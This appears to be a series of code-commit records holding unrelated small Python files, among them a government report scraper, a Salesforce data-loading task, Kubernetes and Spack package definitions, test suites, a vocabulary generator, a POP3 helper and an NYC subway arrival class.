REPORTS_URL = "http://www.fdicoig.gov/Search-Engine.asp"
def run(options):
year_range = inspector.year_range(options)
# Pull the reports
doc = BeautifulSoup(utils.download(REPORTS_URL))
results = doc.find("table", {"cellpadding": "5"}).select("tr")
for index, result in enumerate(results):
if index < 3 or not result.text.strip():
# The first three rows are headers
continue
report = report_from(result, year_range)
if report:
inspector.save_report(report)
def report_from(result, year_range):
title = result.find("em").text.strip()
unreleased = False
try:
report_url = urljoin(REPORTS_URL, result.select("a")[-1].get("href"))
except IndexError:
unreleased = True
report_url = None
landing_url = REPORTS_URL
if report_url:
report_filename = report_url.split("/")[-1]
report_id, extension = os.path.splitext(report_filename)
else:
report_id = "-".join(title.split())[:50]
published_on_text = result.select("td")[2].text
try:
published_on = datetime.datetime.strptime(published_on_text, '%m/%d/%Y')
except ValueError:
logging.debug("[%s] Skipping since all real reports have published dates and this does not" % report_url)
return
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': "fdic",
'inspector_url': "http://www.fdicoig.gov",
'agency': "fdic",
'agency_name': "Federal Deposit Insurance Corporation",
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
if unreleased:
report['unreleased'] = unreleased
report['landing_url'] = landing_url
return report
utils.run(run) if (__name__ == "__main__") else None
| cc0-1.0 | Python | |
545ce0a57b92aaaa26e6f960990648dd05b637af | Add a new task for batch generation and loading. | SalesforceFoundation/CumulusCI,SalesforceFoundation/CumulusCI | cumulusci/tasks/bulkdata/generate_and_load_data.py | cumulusci/tasks/bulkdata/generate_and_load_data.py | import os
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
from cumulusci.tasks.bulkdata import LoadData
from cumulusci.utils import temporary_dir
from cumulusci.core.config import TaskConfig
from cumulusci.core.utils import import_global
from cumulusci.core.exceptions import TaskOptionsError
class GenerateAndLoadData(BaseSalesforceApiTask):
""" Orchestrate creating tempfiles, generating data, loading data, cleaning up tempfiles."""
task_docs = """
Use the `num_records` option to specify how many records to generate.
Use the `mappings` option to specify a mapping file.
Use 'data_generation_task' to specify what Python class to use to generate the data.'
Use 'batch_size' to specify how many records to generate and upload in every batch.
By default it creates the data in a temporary file and then cleans it up later. Specify database_url if you
need more control than that. The use of both database_url and batch_size together is not currently supported.
"""
task_options = {
"num_records": {
"description": "How many records to generate. Precise calcuation depends on the generator.",
"required": True,
},
"batch_size": {
"description": "How many records to create and load at a time..",
"required": False,
},
"mapping": {"description": "A mapping YAML file to use", "required": True},
"data_generation_task": {
"description": "Fully qualified class path of a task to generate the data. Use cumulusci.tasks.bulkdata.factory_generator if you would like to use a Factory Module.",
"required": False,
},
"data_generation_options": {
"description": "Options to pass to the data generator.",
"required": False,
},
"database_url": {
"description": "A URL to store the database (defaults to a transient SQLite file)",
"required": "",
},
}
def _run_task(self):
mapping_file = os.path.abspath(self.options["mapping"])
assert os.path.exists(mapping_file), f"{mapping_file} cannot be found."
database_url = self.options.get("database_url")
num_records = int(self.options["num_records"])
batch_size = int(self.options.get("batch_size", num_records))
if database_url and batch_size != num_records:
raise TaskOptionsError(
"You may not specify both `database_url` and `batch_size` options."
)
with temporary_dir() as tempdir:
num_batches = (num_records // batch_size) + 1
for i in range(0, num_batches):
if i == num_batches - 1: # last batch
batch_size = num_records - (batch_size * i) # leftovers
if batch_size > 0:
self._generate_batch(
database_url, tempdir, mapping_file, batch_size, i
)
def _datagen(self, subtask_options):
class_path = self.options.get("data_generation_task", None)
task_class = import_global(class_path)
task_config = TaskConfig({"options": subtask_options})
data_gen_task = task_class(
self.project_config, task_config, org_config=self.org_config
)
data_gen_task()
def _dataload(self, subtask_options):
subtask_config = TaskConfig({"options": subtask_options})
subtask = LoadData(
project_config=self.project_config,
task_config=subtask_config,
org_config=self.org_config,
flow=self.flow,
name=self.name,
stepnum=self.stepnum,
)
subtask()
def _generate_batch(self, database_url, tempdir, mapping_file, batch_size, index):
if not database_url:
sqlite_path = os.path.join(tempdir, f"generated_data_{index}.db")
database_url = f"sqlite:///" + sqlite_path
subtask_options = {
**self.options,
"mapping": mapping_file,
"database_url": database_url,
"num_records": batch_size,
}
self._datagen(subtask_options)
self._dataload(subtask_options)
| bsd-3-clause | Python | |
cec3eebace1ad5f236761bdd98bef0d5ac52d3ba | Replace list-to-set cast with normal set literal | hmflash/Cura,fieldOfView/Cura,Curahelper/Cura,ynotstartups/Wanhao,ynotstartups/Wanhao,Curahelper/Cura,fieldOfView/Cura,hmflash/Cura | cura/Settings/MaterialSettingsVisibilityHandler.py | cura/Settings/MaterialSettingsVisibilityHandler.py | # Copyright (c) 2017 Ultimaker B.V.
# Uranium is released under the terms of the AGPLv3 or higher.
from UM.Settings.Models.SettingVisibilityHandler import SettingVisibilityHandler
class MaterialSettingsVisibilityHandler(SettingVisibilityHandler):
def __init__(self, parent = None, *args, **kwargs):
super().__init__(parent = parent, *args, **kwargs)
material_settings = {
"default_material_print_temperature",
"material_bed_temperature",
"material_standby_temperature",
"cool_fan_speed",
"retraction_amount",
"retraction_speed",
}
self.setVisible(material_settings)
| # Copyright (c) 2016 Ultimaker B.V.
# Uranium is released under the terms of the AGPLv3 or higher.
from UM.Settings.Models.SettingVisibilityHandler import SettingVisibilityHandler
class MaterialSettingsVisibilityHandler(SettingVisibilityHandler):
def __init__(self, parent = None, *args, **kwargs):
super().__init__(parent = parent, *args, **kwargs)
material_settings = set([
"default_material_print_temperature",
"material_bed_temperature",
"material_standby_temperature",
"cool_fan_speed",
"retraction_amount",
"retraction_speed",
])
self.setVisible(material_settings)
| agpl-3.0 | Python |
8094267faf7a9cdbd1520383f51e537e159cdca2 | Add unit column unit tests. | kdeldycke/cqlengine-relation-columns | tests.py | tests.py | # -*- coding: utf-8 -*-
""" Test relation columns.
"""
import math
import uuid
from unittest import TestCase
import arrow
from cqlengine import columns
from cqlengine.models import Model
def truncate_to_milliseconds(date_time):
""" Truncate datetime to milliseconds and return an arrow object.
Used to emulate cqlengine's datetime conversion from Python to Cassandra.
"""
date_time = arrow.get(date_time)
milliseconds = math.trunc(date_time.microsecond / 1000.0) * 1000
return date_time.replace(microsecond=milliseconds)
class TestCompositeRelationColumn(TestCase):
def test_column_io(self):
class ForeignModel(Model):
organization = columns.Text(partition_key=True)
start_date = columns.DateTime(primary_key=True)
key = columns.UUID(primary_key=True, default=uuid.uuid4)
info = columns.Text()
class TestCompositeRelationColumn(Model):
key = columns.UUID(primary_key=True, default=uuid.uuid4)
foreign_key = columns.CompositeRelation(model='ForeignModel')
self.assertEquals(ForeignModel.objects.count(), 0)
self.assertEquals(TestCompositeRelationColumn.objects.count(), 0)
now = arrow.utcnow()
# Check initial value
test_instance = TestCompositeRelationColumn.create()
self.assertEquals(test_instance.foreign_key, {})
# Check proper transformation of instance's primary key component's
# values into a dict.
foreign_instance = ForeignModel.create(
organization='Dummy organization',
start_date=now,
)
test_instance.update(foreign_key=foreign_instance)
self.assertIsInstance(test_instance.foreign_key, dict)
# Test serialization to raw strings.
self.assertEquals(test_instance.foreign_key, {
'organization': foreign_instance.organization,
'start_date': str(long(truncate_to_milliseconds(
foreign_instance.start_date).float_timestamp * 1000)),
'key': str(foreign_instance.key),
})
# CompositeRelation column doesn't cast primary keys components on the
# fly. It needs reload.
test_instance = TestCompositeRelationColumn.get(test_instance.key)
self.assertIsInstance(test_instance.foreign_key, dict)
self.assertEquals(test_instance.foreign_key, {
'organization': foreign_instance.organization,
'start_date': truncate_to_milliseconds(
foreign_instance.start_date),
'key': foreign_instance.key,
})
# Check that CompositeRelation deserialize primary key components into
# their original types.
self.assertIsInstance(test_instance.foreign_key['organization'],
basestring)
self.assertIsInstance(test_instance.foreign_key['start_date'],
arrow.arrow.Arrow)
self.assertIsInstance(test_instance.foreign_key['key'],
uuid.UUID)
# Check that a related object can be fetched from the raw dict
fetched_model = ForeignModel.filter(**test_instance.foreign_key).get()
self.assertDictContainsSubset({
'organization': foreign_instance.organization,
'start_date': truncate_to_milliseconds(
foreign_instance.start_date),
'key': foreign_instance.key,
}, dict(fetched_model.items()))
| bsd-3-clause | Python | |
71f073ca40459c56ce666650af982a9f08d613f1 | Add support for PodDisruptionBudget | fiaas/k8s | k8s/models/pod_disruption_budget.py | k8s/models/pod_disruption_budget.py | #!/usr/bin/env python
# -*- coding: utf-8
from __future__ import absolute_import
import six
from .common import ObjectMeta
from ..base import Model
from ..fields import Field, ListField
class PodDisruptionBudgetMatchExpressions(Model):
key = Field(six.text_type)
operator = Field(six.text_type)
values = ListField(six.text_type)
class PodDisruptionBudgetSelector(Model):
matchExpressions = Field(PodDisruptionBudgetMatchExpressions)
matchLabels = Field(dict)
class PodDisruptionBudgetSpec(Model):
minAvailable = Field(six.text_type)
maxUnavailable = Field(six.text_type)
selector = Field(PodDisruptionBudgetSelector)
class PodDisruptionBudget(Model):
class Meta:
url_template = "/apis/autoscaling/v1/namespaces/{namespace}/poddisruptionbudget/{name}"
metadata = Field(ObjectMeta)
spec = Field(PodDisruptionBudgetSpec)
| apache-2.0 | Python | |
4c46b7b86171b89f0c85f6d48eaf6d24e702c6f9 | Add a Tasks sample that demonstrates Service accounts. | jonparrott/oauth2client,clancychilds/oauth2client,googleapis/oauth2client,jonparrott/oauth2client,clancychilds/oauth2client,googleapis/google-api-python-client,googleapis/google-api-python-client,googleapis/oauth2client,google/oauth2client,google/oauth2client | samples/service_account/tasks.py | samples/service_account/tasks.py | #!/usr/bin/python2.4
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple command-line sample that demonstrates service accounts.
Lists all the Google Task Lists associated with the given service account.
Service accounts are created in the Google API Console. See the documentation
for more information:
https://developers.google.com/console/help/#WhatIsKey
Usage:
$ python tasks.py
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import httplib2
import pprint
import sys
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
def main(argv):
# Load the key in PKCS 12 format that you downloaded from the Google API
# Console when you created your Service account.
f = file('key.p12', 'rb')
key = f.read()
f.close()
# Create an httplib2.Http object to handle our HTTP requests and authorize it
# with the Credentials. Note that the first parameter, service_account_name,
# is the Email address created for the Service account. It must be the email
# address associated with the key that was created.
credentials = SignedJwtAssertionCredentials(
'141491975384@developer.gserviceaccount.com',
key,
scope='https://www.googleapis.com/auth/tasks')
http = httplib2.Http()
http = credentials.authorize(http)
service = build("tasks", "v1", http=http)
# List all the tasklists for the account.
lists = service.tasklists().list().execute(http)
pprint.pprint(lists)
if __name__ == '__main__':
main(sys.argv)
| apache-2.0 | Python | |
b541d4c9ab1d7f199cc551179f454c5c3a53625f | add tests for "patch" command | red-hat-storage/rhcephpkg,red-hat-storage/rhcephpkg | rhcephpkg/tests/test_patch.py | rhcephpkg/tests/test_patch.py | import os
import pytest
from rhcephpkg import Patch
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
FIXTURES_DIR = os.path.join(TESTS_DIR, 'fixtures')
class FakePatch(object):
pass
class TestPatch(object):
def test_wrong_branch(self, monkeypatch):
monkeypatch.setenv('HOME', FIXTURES_DIR)
monkeypatch.setattr('rhcephpkg.util.current_branch',
lambda: 'ceph-2-ubuntu')
patch = Patch(())
with pytest.raises(SystemExit) as e:
patch._run()
assert str(e.value) == 'ceph-2-ubuntu is not a patch-queue branch'
def test_get_rhbzs(self, monkeypatch):
p = Patch(())
fakepatch = FakePatch()
fakepatch.subject = 'my git change'
fakepatch.long_desc = 'my long description about this change'
bzs = p.get_rhbzs(fakepatch)
assert len(bzs) == 0
# TODO: more tests here, for commits that really contain RHBZs.
# TODO: more tests, faking check_call and check_output, to verify that
# we're running the proper gbp and git commands.
| mit | Python | |
ed27c75a2d3400955d8e3e85d08d480db3fd3657 | Add generate_vocab script | chunfengh/seq2seq,shashankrajput/seq2seq,google/seq2seq,shashankrajput/seq2seq,liyi193328/seq2seq,kontact-chan/seq2seq,kontact-chan/seq2seq,liyi193328/seq2seq,liyi193328/seq2seq,liyi193328/seq2seq,chunfengh/seq2seq,kontact-chan/seq2seq,shashankrajput/seq2seq,chunfengh/seq2seq,google/seq2seq,kontact-chan/seq2seq,liyi193328/seq2seq,google/seq2seq,chunfengh/seq2seq,shashankrajput/seq2seq,google/seq2seq | seq2seq/scripts/generate_vocab.py | seq2seq/scripts/generate_vocab.py | #! /usr/bin/env python
#pylint: disable=invalid-name
"""
Generate vocabulary for a tokenized text file.
"""
import argparse
import collections
parser = argparse.ArgumentParser(description="Generate vocabulary for a tokenized text file.")
parser.add_argument("--input_file", type=str, help="path to the input file", required=True)
parser.add_argument("--output_file", type=str, help="path to the vocabulary file", required=True)
parser.add_argument("--min_frequency", dest="min_frequency", type=int, default=0,
help="Minimum frequency of a word to be included in the vocabulary.")
parser.add_argument("--max_vocab_size", dest="max_vocab_size", type=int,
help="Maximum number of words in the vocabulary")
parser.add_argument("--downcase", dest="downcase", type=bool,
help="If set to true, downcase all text before processing.", default=False)
args = parser.parse_args()
# Counter for all words in the vocabulary
cnt = collections.Counter()
with open(args.input_file) as f:
for line in f:
if args.downcase:
line = line.lower()
tokens = line.strip().split(" ")
cnt.update(tokens)
print("Found {} unique words in the vocabulary.".format(len(cnt)))
# Filter words below the frequency threshold
if args.min_frequency > 0:
filtered_words = [(w, c) for w, c in cnt.most_common() if c > args.min_frequency]
cnt = collections.Counter(dict(filtered_words))
print("Found {} unique words with frequency > {}.".format(len(cnt), args.min_frequency))
# Sort words by 1. frequency 2. lexically to break ties
word_with_counts = cnt.most_common()
word_with_counts = sorted(word_with_counts, key=lambda x: (x[1], x[0]), reverse=True)
# Take only max-vocab
if args.max_vocab_size is not None:
word_with_counts = word_with_counts[:args.max_vocab_size]
with open(args.output_file, "w") as f:
for word, count in word_with_counts:
f.write("{}\n".format(word))
print("Wrote vocab of size {}: {}".format(len(word_with_counts), args.output_file))
| apache-2.0 | Python | |
21eac65d8a252e9d3cc83d97a9f270ef0078be9c | add indexer | gavin09/peen_movie,gavin09/peen_movie,gavin09/peen_movie | indexer.py | indexer.py | # -*- coding: utf-8 -*-
import json
import os
import argparse
import sys
import re
class Indexer:
def __init__(self):
self.forward_index = dict()
def create_index(self, raw_data, keyword):
keyword_utf8 = keyword.decode('utf-8')
if not self.forward_index.has_key(keyword_utf8):
self.forward_index[keyword_utf8] = dict()
self.forward_index[keyword_utf8]['positive'] = list()
self.forward_index[keyword_utf8]['negative'] = list()
self.forward_index[keyword_utf8]['others'] = list()
for data in raw_data:
if keyword_utf8 in data[1]:
if '好雷'.decode('utf-8') in data[1]:
self.forward_index[keyword_utf8]['positive'].append((data[0], data[1]))
elif '負雷'.decode('utf-8') in data[1]:
self.forward_index[keyword_utf8]['negative'].append((data[0], data[1]))
else:
self.forward_index[keyword_utf8]['others'].append((data[0], data[1]))
def load_data_from_file(self, dirname, filename):
if os.path.exists(os.path.join(dirname, filename)):
with open(os.path.join(dirname, filename), 'r') as readfile:
self.raw_data = json.load(readfile)
def get_index(self, keyword, search_type):
keyword_utf8 = keyword.decode('utf-8')
if self.forward_index.has_key(keyword_utf8):
if search_type in ('positive', 'negative', 'others'):
for result in self.forward_index[keyword_utf8][search_type]:
print "Title {}, Link {}".format(result[1].encode('utf-8'), result[0].encode('utf-8'))
else:
return None
if __name__ == '__main__':
arguments = argparse.ArgumentParser()
arguments.add_argument('--dirname', help='directory name')
arguments.add_argument('--filename', help='filename')
arguments.add_argument('--keyword', help='keyword to create index')
args = arguments.parse_args()
indexer = Indexer()
if os.path.exists(os.path.join(args.dirname, args.filename)):
with open(os.path.join(args.dirname, args.filename), 'r') as readfile:
data = json.load(readfile)
indexer.create_index(data, args.keyword)
else:
sys.exit()
| apache-2.0 | Python | |
37e87ad6eed85e83a2199f851e8b07135d779909 | Add wsgi script | fmarco76/DiscourseSSO,fmarco76/DiscourseSSO | DiscourseSSO.wsgi | DiscourseSSO.wsgi | # Copyright 2015 INFN
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
WSGI script to run the application.
Configure the environment variable DISCOURSE_SSO_CONFIG in order to read the
configuration file with the variables:
- DISCOURSE_URL: Discourse URL to send the user back
- DISCOURSE_SECRET_KEY: Secret key shared with the Discourse server
- DISCOURSE_USER_MAP: Attribute to read from the environment after user
validation
- All Flask configuration values
To run in a virtual environment add the activation code. Es.:
activate_this = '/path/to/env/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
"""
from sso import app as application
| apache-2.0 | Python | |
261b2879c830aeaa21351c34a78dc0b5262436c2 | Create 7kyu_simple_fun138_similarity.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/7kyu/7kyu_simple_fun138_similarity.py | Solutions/7kyu/7kyu_simple_fun138_similarity.py | def similarity(a, b):
return len(set(a).intersection(set(b)))/len(set(a)|set(b))
| mit | Python | |
c5427bc00678e9f9122b8201b79af2ab454288f3 | Create popServer.py | GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde,GiladE/birde | popServer.py | popServer.py | __author__ = 'JontyHome'
import poplib
class popServer():
# host = ''
# username = ''
# password = ''
# port = 0
def __init__(self, username, password, host, port):
self.host = host
self.username = username
self.password = password
self.port = port
self.mailbox = poplib.POP3_SSL(self.host,self.port)
self.mailbox.user(self.username)
self.mailbox.pass_(self.password)
self.mailbox.set_debuglevel(1)
def close_server(self):
self.mailbox.quit()
def get_status(self):
serverstatus = self.mailbox.stat()
return serverstatus
def get_messages(self):
return self.mailbox.list()
def display_message(self,index):
(server_msg, body, octets) = self.mailbox.retr(index)
self.debug(200, "Server Message: " , server_msg)
self.debug(200, "Number of Octets: " , octets)
self.debug(200, "Message body:")
for line in body:
print line
| mit | Python | |
eaf59371ea4ec9d5ceb98331c1a4b58a54558d3b | Solve Ch3_Q5 - Implement queue using two stacks | roommen/CtCI | fourth_edition/ch3_stacks_and_queues/python/3.5.py | fourth_edition/ch3_stacks_and_queues/python/3.5.py | '''
Implement a MyQueue class which implements a queue using two stacks.
'''
stack1 = list()
stack2 = list()
max_ = 10
def push(val):
global stack1, stack2
if len(stack1) == max_:
if len(stack2) == 0:
for x in stack1[::-1]:
stack2.append(x)
stack1 = []
else:
return "Queue Full!"
stack1.append(val)
def pop():
global stack1, stack2
if len(stack2) == 0:
if len(stack1) > 0:
stack2 = stack1
stack1 = []
else:
return "Queue Empty"
return stack2.pop(-1)
def queue(val):
# Call the push
global stack1, stack2
push(val)
# print(stack1, stack2)
def dequeue():
# Call the pop
global stack1, stack2
pop_out = pop()
# print(stack1, stack2)
return pop_out
queue(10)
queue(20)
queue(30)
queue(40)
queue(50)
queue(60)
queue(70)
queue(80)
queue(90)
queue(100)
queue(110)
queue(120)
queue(130)
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
queue(140)
print(dequeue())
print(dequeue())
print(dequeue())
print(dequeue())
queue(150)
| mit | Python | |
39668777b1f5579b37746521ba95b506bea08d1a | Prepare v1.2.295.dev | qk4l/Flexget,ibrahimkarahan/Flexget,grrr2/Flexget,jawilson/Flexget,patsissons/Flexget,jawilson/Flexget,Danfocus/Flexget,vfrc2/Flexget,grrr2/Flexget,jawilson/Flexget,jacobmetrick/Flexget,LynxyssCZ/Flexget,antivirtel/Flexget,cvium/Flexget,dsemi/Flexget,tsnoam/Flexget,malkavi/Flexget,Flexget/Flexget,sean797/Flexget,vfrc2/Flexget,tsnoam/Flexget,JorisDeRieck/Flexget,tarzasai/Flexget,gazpachoking/Flexget,tobinjt/Flexget,malkavi/Flexget,spencerjanssen/Flexget,offbyone/Flexget,tobinjt/Flexget,Danfocus/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,patsissons/Flexget,antivirtel/Flexget,ZefQ/Flexget,thalamus/Flexget,OmgOhnoes/Flexget,antivirtel/Flexget,drwyrm/Flexget,Flexget/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,xfouloux/Flexget,dsemi/Flexget,cvium/Flexget,thalamus/Flexget,Flexget/Flexget,ZefQ/Flexget,poulpito/Flexget,drwyrm/Flexget,xfouloux/Flexget,tobinjt/Flexget,cvium/Flexget,LynxyssCZ/Flexget,tsnoam/Flexget,OmgOhnoes/Flexget,oxc/Flexget,grrr2/Flexget,ratoaq2/Flexget,vfrc2/Flexget,malkavi/Flexget,malkavi/Flexget,ianstalk/Flexget,oxc/Flexget,offbyone/Flexget,spencerjanssen/Flexget,thalamus/Flexget,qk4l/Flexget,Pretagonist/Flexget,qk4l/Flexget,oxc/Flexget,poulpito/Flexget,lildadou/Flexget,tobinjt/Flexget,sean797/Flexget,crawln45/Flexget,Pretagonist/Flexget,Flexget/Flexget,gazpachoking/Flexget,Danfocus/Flexget,patsissons/Flexget,tarzasai/Flexget,poulpito/Flexget,lildadou/Flexget,lildadou/Flexget,JorisDeRieck/Flexget,crawln45/Flexget,Danfocus/Flexget,qvazzler/Flexget,ratoaq2/Flexget,ianstalk/Flexget,OmgOhnoes/Flexget,crawln45/Flexget,tarzasai/Flexget,crawln45/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,spencerjanssen/Flexget,JorisDeRieck/Flexget,drwyrm/Flexget,ZefQ/Flexget,ibrahimkarahan/Flexget,ibrahimkarahan/Flexget,xfouloux/Flexget,offbyone/Flexget,dsemi/Flexget,sean797/Flexget,Pretagonist/Flexget,ratoaq2/Flexget,ianstalk/Flexget,jawilson/Flexget,LynxyssCZ/Flexget | flexget/_version.py | flexget/_version.py | """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.295.dev'
| """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.294'
| mit | Python |
f3bbb887d76ec428c4926f94c119220cc8c63cf8 | add offline script to ingest IDOT archived road conditions | akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem | scripts/roads/idot_csv_ingest.py | scripts/roads/idot_csv_ingest.py | """Be able to merge a CSV file that IDOT provides"""
import pandas as pd
import psycopg2
import sys
import datetime
pgconn = psycopg2.connect(database='postgis', host='localhost', user='mesonet',
port=5555)
cursor = pgconn.cursor()
xref = {}
cursor.execute("""SELECT idot_id, segid from roads_base""")
for row in cursor:
xref[row[0]] = row[1]
ROADCOND = {
'dry pavement': 0,
'wet': 1,
'partially covered with frost': 3,
'partially covered with snow': 39,
'partially covered with ice': 27,
'partially covered with slush': 56,
'partially covered with mix': 15,
'completely covered with frost': 11,
'completely covered with snow': 47,
'completely covered with ice': 35,
'completely covered with slush': 64,
'completely covered with mixed': 23,
'travel not advised': 51,
'impassable': 86,
'partially covered with mixed snow ice or slush': 15,
'completely covered with mixed snow ice or slush': 23,
'icy bridges': 27,
'seasonal': 0,
'Seasonal': 0,
'seasonal roadway conditions': 0,
'impassable': 86,
}
df = pd.read_csv(sys.argv[1])
for i, row in df.iterrows():
segid = xref[int(row['SEGMENT_ID'])]
condcode = ROADCOND[row['HL_PAVEMENT_CONDITION']]
ts = datetime.datetime.strptime(str(row['CARS_MSG_UPDATE_DATE']),
'%Y%m%d%H%M%S')
cursor.execute("""INSERT into roads_2015_2016_log(segid, valid, cond_code,
raw) VALUES (%s, %s, %s, %s)""", (segid, ts, condcode,
row['HL_PAVEMENT_CONDITION']))
cursor.close()
pgconn.commit()
| mit | Python | |
8c17c087ee1674bccfd8d34d382eca508fdf7cd9 | Create train.py | simonbr73/nyc-subway-finder | train.py | train.py | import time
import calendar
class Train:
"""Creates a train object that represents one subway train we have data for. The methods
contained in this class interpret information we get from the MTA's feed, such as route number,
direction, arrival time, and upcoming stops.
"""
def __init__(self, trip_update, stops, position_in_list):
"""Initializes one train object with a 'trip_update' object from the MTA data, a
dictionary of all the stop IDs and names in the subway system, and the index of the
train in the master list of train objects.
"""
self.trip_update = trip_update
self.stops = stops
self.routeID = str(self.trip_update.trip.route_id)
# A minor quirk in the MTA's data is fixed here. S trains were listed as GS for some reason
if self.routeID == "GS":
self.routeID = "S"
self.index = position_in_list
def showInfo(self, stop_number):
"""Given the stop number (the nth stop on the train's remaining route) as an
argument, this method prints out a message containing the train's direction,
route number, station, and arrival time.
"""
if self.arrivalTime == '': # At origin terminals, there will only be a departure time listed
if self.getArrivalTime(stop_number) == '00':
print "There is a", self.getDirection(), self.routeID, "train departing from", self.getStop(stop_number), "now."
elif self.getArrivalTime(stop_number) == '01':
print "There is a", self.getDirection(), self.routeID, "train departing from", self.getStop(stop_number), "in 1 minute."
else:
print "There is a", self.getDirection(), self.routeID, "train departing from", self.getStop(stop_number), "in", int(self.getArrivalTime(stop_number)), "minutes."
elif self.getArrivalTime(stop_number) == '01':
print "There is a", self.getDirection(), self.routeID, "train arriving at", self.getStop(stop_number), "in 1 minute."
elif self.getArrivalTime(stop_number) == '00':
print "There is a", self.getDirection(), self.routeID, "train arriving at", self.getStop(stop_number), "now."
else:
print "There is a", self.getDirection(), self.routeID, "train arriving at", self.getStop(stop_number), "in", int(self.getArrivalTime(stop_number)), "minutes."
def getArrivalTime(self, stop_number):
"""This method, given a stop number, returns the number of minutes it will take
for the train to arrive at the specified station.
"""
# Get absolute POSIX time from MTA data
self.arrivalTime = str(self.trip_update.stop_time_update[stop_number].arrival)
departureTime = str(self.trip_update.stop_time_update[stop_number].departure)
if self.arrivalTime != '': # Some stops only have a departure time listed
unix_time = float(self.arrivalTime.strip('time: '))
else:
unix_time = int(departureTime.strip('time: '))
# Calculate difference, in POSIX time, between arrival time and current time
# There is a 60-second offset here to account for delays in data transmission
# that would otherwise produce negative differences (i.e. train arriving in
# -1 minutes)
difference = unix_time + 60 - calendar.timegm(time.gmtime())
# Convert POSIX difference to struct_time difference, then return minutes
utc_difference = time.gmtime(difference)
readable_difference = time.strftime("%M", utc_difference)
return readable_difference
def getAllStops(self):
"""Gets all upcoming stops for the train.
Returns a list of form [stop number, station name].
"""
all_stops = []
# Iterate through all the stop_time_update objects in trip_update
for i in range(len(self.trip_update.stop_time_update)):
stop = self.getStop(i)
if stop not in all_stops:
all_stops.append([i, stop])
return all_stops
def getStop(self, i):
"""Gets the nth stop for the train given the stop number as an argument.
"""
stopID = self.trip_update.stop_time_update[i].stop_id
stop = self.stops[stopID]
return stop
def getDirection(self):
"""Gets the direction of the train. Returns 'N' or 'S'.
"""
if 'N' in str(self.trip_update.trip.trip_id):
direction = 'northbound'
if 'S' in str(self.trip_update.trip.trip_id):
direction = 'southbound'
return direction
def getIndex(self):
"""Gets the position of the train in the master train list.
"""
return self.index
| mit | Python | |
c2d1344c518dcf7c4cd20786bfa7cf649b977ca5 | Create new package (#7378) | LLNL/spack,EmreAtes/spack,krafczyk/spack,LLNL/spack,iulian787/spack,iulian787/spack,tmerrick1/spack,krafczyk/spack,matthiasdiener/spack,tmerrick1/spack,EmreAtes/spack,iulian787/spack,LLNL/spack,matthiasdiener/spack,EmreAtes/spack,EmreAtes/spack,matthiasdiener/spack,matthiasdiener/spack,mfherbst/spack,tmerrick1/spack,tmerrick1/spack,tmerrick1/spack,iulian787/spack,krafczyk/spack,LLNL/spack,mfherbst/spack,mfherbst/spack,matthiasdiener/spack,krafczyk/spack,LLNL/spack,krafczyk/spack,mfherbst/spack,iulian787/spack,EmreAtes/spack,mfherbst/spack | var/spack/repos/builtin/packages/perl-file-slurper/package.py | var/spack/repos/builtin/packages/perl-file-slurper/package.py | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PerlFileSlurper(PerlPackage):
"""A simple, sane and efficient module to slurp a file"""
homepage = "http://search.cpan.org/~leont/File-Slurper/lib/File/Slurper.pm"
url = "http://search.cpan.org/CPAN/authors/id/L/LE/LEONT/File-Slurper-0.011.tar.gz"
